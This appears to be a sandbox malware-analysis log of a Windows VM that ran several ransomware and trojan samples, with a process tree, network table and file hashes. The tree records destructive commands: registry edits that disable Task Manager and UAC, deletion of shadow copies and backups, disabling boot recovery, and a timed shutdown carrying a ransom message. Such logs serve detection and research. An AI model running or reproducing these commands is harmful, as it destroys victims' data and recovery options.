"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7332 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6064 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\avast-englishversion.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\kozalocker-englishversion (GoatLocker).bat" "
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D12.tmp\TrojanRansomCovid29.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7D12.tmp\fakeerror.vbs"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe
Cov29Cry.exe
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 9
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29LockScreen.exe
Cov29LockScreen.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6216 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7044 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8
C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe
"C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe"
C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe
"C:\Users\Admin\Downloads\DELmE's Batch Virus Generator v 2.0.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3336 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6720 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a8 0x4a4
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4572 -ip 4572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 1080
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe"
C:\Windows\SysWOW64\appidtel.exe
"C:\Windows\System32\appidtel.exe"
C:\Windows\SysWOW64\ARP.EXE
"C:\Windows\System32\ARP.EXE"
C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\System32\AtBroker.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\System32\attrib.exe"
C:\Windows\SysWOW64\auditpol.exe
"C:\Windows\System32\auditpol.exe"
C:\Windows\SysWOW64\autochk.exe
"C:\Windows\System32\autochk.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\System32\autoconv.exe"
C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\System32\autofmt.exe"
C:\Windows\SysWOW64\backgroundTaskHost.exe
"C:\Windows\System32\backgroundTaskHost.exe"
C:\Windows\SysWOW64\BackgroundTransferHost.exe
"C:\Windows\System32\BackgroundTransferHost.exe"
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe"
C:\Windows\SysWOW64\bootcfg.exe
"C:\Windows\System32\bootcfg.exe"
C:\Windows\SysWOW64\bthudtask.exe
"C:\Windows\System32\bthudtask.exe"
C:\Windows\SysWOW64\ByteCodeGenerator.exe
"C:\Windows\System32\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\cacls.exe
"C:\Windows\System32\cacls.exe"
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\CameraSettingsUIHost.exe
"C:\Windows\System32\CameraSettingsUIHost.exe"
C:\Windows\SysWOW64\CertEnrollCtrl.exe
"C:\Windows\System32\CertEnrollCtrl.exe"
C:\Windows\SysWOW64\certreq.exe
"C:\Windows\System32\certreq.exe"
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\System32\certutil.exe"
C:\Windows\SysWOW64\charmap.exe
"C:\Windows\System32\charmap.exe"
C:\Windows\SysWOW64\CheckNetIsolation.exe
"C:\Windows\System32\CheckNetIsolation.exe"
C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\System32\chkdsk.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\chkntfs.exe
"C:\Windows\System32\chkntfs.exe"
C:\Windows\SysWOW64\choice.exe
"C:\Windows\System32\choice.exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa385e855 /state1:0x41c64e6d
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| GB | 172.217.169.86:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| GB | 216.58.212.202:443 | firebaseremoteconfig.googleapis.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | fd029b581aa2c1774d4ad07560ec13c9 |
| SHA1 | 2b12ab41182d53c718f2e8baecacb329169df182 |
| SHA256 | 908da661a85392d485dc5149310e222b94163f6f2db4192968bf272e5d71d64d |
| SHA512 | f45a53e1e3e57011058305958fbb7c16efed898c6388b20e783b5b5c63322fa0f14dd60250b103916fe8215999c3555c5e763566f3b6f140a0993d330a458fde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old~RFe5a8adc.TMP
| MD5 | c29e1fcf30c9a4d71e88443805f2dd85 |
| SHA1 | ec823aa1adb4a207877101cf1574a17ef332d155 |
| SHA256 | bd528c407c413d0a5aa27026175390c9ab2818027d23cd62b4b426f185c55ab3 |
| SHA512 | 6c8cc46a0bb1ae875df188eb3b5e68837816e13e6f85b3494afbd38c288a380492588913cea2263fabf68de851b2f45c5bc55e10d8f09e6d09511c856dc32ebc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
| MD5 | d2fa74eca9d32a4d2e972aac6374e508 |
| SHA1 | 44d505f520ec8840633b7ec0534a98a135f0c261 |
| SHA256 | ef08e7461ad13377993a74ae88ea9afcac9d54c3051fc9291cdc1df89ff339ef |
| SHA512 | a6c545da622f610d174431ef09cd466834bf47c14fd9cfa6571a4207452844a161958adf6c30370facae99a446fb7d0a33ef0d6745024430c9c977043ab00f47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0cec5e31020f6573fe8753827cfbf3ce |
| SHA1 | 723aa1319ccf7173733770d012b1c738c8534491 |
| SHA256 | 3b4dbaea414400fe85349c9c1c5386d54a8141f7f23b163ce3c46f42cd470955 |
| SHA512 | a5d8d05d511691891f756d0aa3aa3df110fed3e2db6f4d21e831f6f7cda78ca4d3ada139ac1e5948df680e88bb659b51deadedfb5b35818a2ad2f41090b7d638 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000003.log
| MD5 | c8f02f64f7f1789d10d43d73fff8be13 |
| SHA1 | af1bd6c9549f229f42ca81c694d7cbd47c579d3e |
| SHA256 | 42052cc2172b162a6278d826b54f335180d07c11b0eefd9f796efb4707b487e0 |
| SHA512 | f928e11a7507895f79a0e488d0e8703c1eebb76e33ba30530c8360abdb96463c6e58143558fd0b2cca44eb87e664f0439a255a40af45b69e918890e2a11cb59c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 55707d59c151622b8b6f73b3ec748840 |
| SHA1 | 469dd2fb8ae0bf0a166b046831473f1e145da7f2 |
| SHA256 | 51604ae27b0f6d9adb2cf911128f2f5bc43e3f5f1ebf95b64c5d99a091bad96a |
